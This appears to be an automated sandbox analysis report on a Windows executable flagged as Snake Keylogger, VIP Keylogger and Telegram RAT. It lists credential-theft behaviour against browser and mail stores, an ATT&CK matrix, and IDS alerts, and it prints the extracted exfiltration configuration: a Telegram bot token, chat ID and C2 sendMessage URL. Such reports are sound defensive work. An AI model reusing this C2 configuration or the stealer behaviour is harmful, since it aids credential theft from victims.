Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595954	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595822	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595657	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595537	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595407	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595282	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595157	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 595043	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594704	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594579	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594454	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594329	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594204	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 594079	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 593954	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Thread delayed: delay time: 593829	Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior

Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd602ac456f2b6<
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd60976c69a7f8<
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd60ef14f4b094<
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd5fe73a8a400c<
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd5f79cbeac367<
Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.0000000004730000.00000004.00000020.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000003.3004838964.0000000004730000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd5f1a7d0f69c8<
Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.00000000046E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWXhs
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd5ef2e8206767<
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd5f45bd19a0d5<
Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.00000000350B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd5fb00e832d02<

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	API call chain: ExitProcess graph end node			graph_0-4198
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	API call chain: ExitProcess graph end node			graph_0-4029

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Code function: 0_2_738F1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_738F1A98

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Process created: C:\Users\user\Desktop\CWu89IbJQw.exe "C:\Users\user\Desktop\CWu89IbJQw.exe"

Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Queries volume information: C:\Users\user\Desktop\CWu89IbJQw.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403348

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CWu89IbJQw.exe PID: 2628, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: C:\Users\user\Desktop\CWu89IbJQw.exe

Directory queried: number of queries: 1001

Source: Yara match

File source: Process Memory Space: CWu89IbJQw.exe PID: 2628, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CWu89IbJQw.exe PID: 2628, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	12 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	14 File and Directory Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source: 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg", "Chat id": "744079942"}
Source: 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg", "Chat_id": "744079942", "Version": "4.4"}
Source: CWu89IbJQw.exe.2628.12.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendMessage"}

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_380887A8 CryptUnprotectData,		12_2_380887A8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 12_2_38088EF1 CryptUnprotectData,		12_2_38088EF1

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49728 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49727 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49733 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49732 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49734 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49730 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49731 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49729 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.11:49726 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49735 -> 149.154.167.220:443

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 0458F45Dh	12_2_0458F4AC
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 0458F45Dh	12_2_0458F2C0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 0458FC19h	12_2_0458F961
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E93308h	12_2_37E92EF0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E92D41h	12_2_37E92A90
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E9F781h	12_2_37E9F4D8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E9EA79h	12_2_37E9E7D0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E9E621h	12_2_37E9E378
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E9E1C9h	12_2_37E9DF20
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E90D0Dh	12_2_37E90B30
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E916F8h	12_2_37E90B30
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E9DD71h	12_2_37E9DAC8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E9D919h	12_2_37E9D670
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_37E90673
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E93308h	12_2_37E93236
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E9D4C1h	12_2_37E9D218
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E9D069h	12_2_37E9CDC0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E9FBD9h	12_2_37E9F930
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E9F329h	12_2_37E9F080
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_37E90040
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_37E90853
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 37E9EED1h	12_2_37E9EC28
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38087EB5h	12_2_38087B78
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808C070h	12_2_3808BDA0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38089280h	12_2_38088FB0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380832B1h	12_2_38083008
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808D2D0h	12_2_3808D000
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38086CC1h	12_2_38086A18
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808A4E0h	12_2_3808A210
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808F2F8h	12_2_3808F028
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380848C9h	12_2_38084620
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808C508h	12_2_3808C238
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380862D9h	12_2_38086030
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38089718h	12_2_38089448
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380802E9h	12_2_38080040
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38081CF9h	12_2_38081A50
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38083709h	12_2_38083460
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808E530h	12_2_3808E260
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38084D21h	12_2_38084A78
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808B740h	12_2_3808B470
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38087119h	12_2_38086E70
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38086733h	12_2_38086488
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38080741h	12_2_38080498
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808D768h	12_2_3808D498
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38082151h	12_2_38081EA8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808A978h	12_2_3808A6A8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38087571h	12_2_380872C8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808F790h	12_2_3808F4C0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38085179h	12_2_38084ED0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808C9A0h	12_2_3808C6D0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38089BB0h	12_2_380898E0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808E9C8h	12_2_3808E6F8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38080B99h	12_2_380808F0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808BBD8h	12_2_3808B908
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380825A9h	12_2_38082300
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380855D1h	12_2_38085328
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380879C9h	12_2_38087720
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808DC00h	12_2_3808D930
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38080FF1h	12_2_38080D48
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808AE10h	12_2_3808AB40
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38082A01h	12_2_38082758
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808FC00h	12_2_3808F958
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808CE38h	12_2_3808CB68
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808A048h	12_2_38089D78
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38085A29h	12_2_38085780
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808EE60h	12_2_3808EB90
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38081449h	12_2_380811A0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38082E59h	12_2_38082BB0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808E098h	12_2_3808DDC8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 3808B2A8h	12_2_3808AFD8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 38085E81h	12_2_38085BD8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380818A1h	12_2_380815F8
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FAF41h	12_2_380FAC48
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F4401h	12_2_380F4090
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F7AA9h	12_2_380F77B0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F4AD9h	12_2_380F47E0
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F10D8h	12_2_380F0E08
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F8901h	12_2_380F8608
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FF6F9h	12_2_380FF400
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F5DF9h	12_2_380F5B00
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F27D0h	12_2_380F2500
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FDF11h	12_2_380FDC18
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FB409h	12_2_380FB110
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F9C21h	12_2_380F9928
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F7119h	12_2_380F6E20
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F1A08h	12_2_380F1738
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F5931h	12_2_380F5638
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FF231h	12_2_380FEF38
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F3100h	12_2_380F2E30
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FC729h	12_2_380FC430
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F0310h	12_2_380F0040
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F8439h	12_2_380F8140
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F6C51h	12_2_380F6958
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FDA49h	12_2_380FD750
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F2338h	12_2_380F2068
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FC261h	12_2_380FBF68
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F3A30h	12_2_380F3760
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F9759h	12_2_380F9460
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F7F71h	12_2_380F7C78
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FED69h	12_2_380FEA70
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F5469h	12_2_380F5170
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F0C40h	12_2_380F0970
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FD581h	12_2_380FD288
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380FAA79h	12_2_380FA780
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F2C69h	12_2_380F2998
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F9291h	12_2_380F8F98
Source: C:\Users\user\Desktop\CWu89IbJQw.exe	Code function: 4x nop then jmp 380F6789h	12_2_380F6490
